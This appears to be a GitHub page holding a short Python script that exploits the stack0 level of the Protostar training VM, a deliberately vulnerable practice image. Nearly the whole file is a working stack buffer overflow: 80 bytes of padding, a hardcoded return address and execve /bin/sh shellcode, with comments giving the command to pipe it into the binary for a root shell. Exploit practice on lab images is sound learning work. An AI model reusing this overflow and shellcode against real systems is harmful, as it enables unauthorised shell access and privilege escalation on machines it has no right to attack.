-
Notifications
You must be signed in to change notification settings - Fork 2
/
protostar-stack0.py
27 lines (17 loc) · 745 Bytes
/
protostar-stack0.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#!/usr/bin/env python
#
# local exploit for stack0 from protostar to get root shell
# you can download protostar iso from here: https://www.vulnhub.com/entry/exploit-exercises-protostar-v2,32/
# @bing0o, @hack1lab
import struct
shit = "A" * 80
# if you only want overwrite the "modified" variable just active the comment below and make the rest of the code as a comment :)
"""
mod = "A" * 65
print mod
"""
esp_addr = struct.pack('I',0xbffff690)
sh = "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
print shit + esp_addr + sh
#To get shell run: (python /tmp/protostar-stack0.py; cat) | ./stack0
# or just overwrite the "modified" variable by: python protostar-stack0.py | ./stack0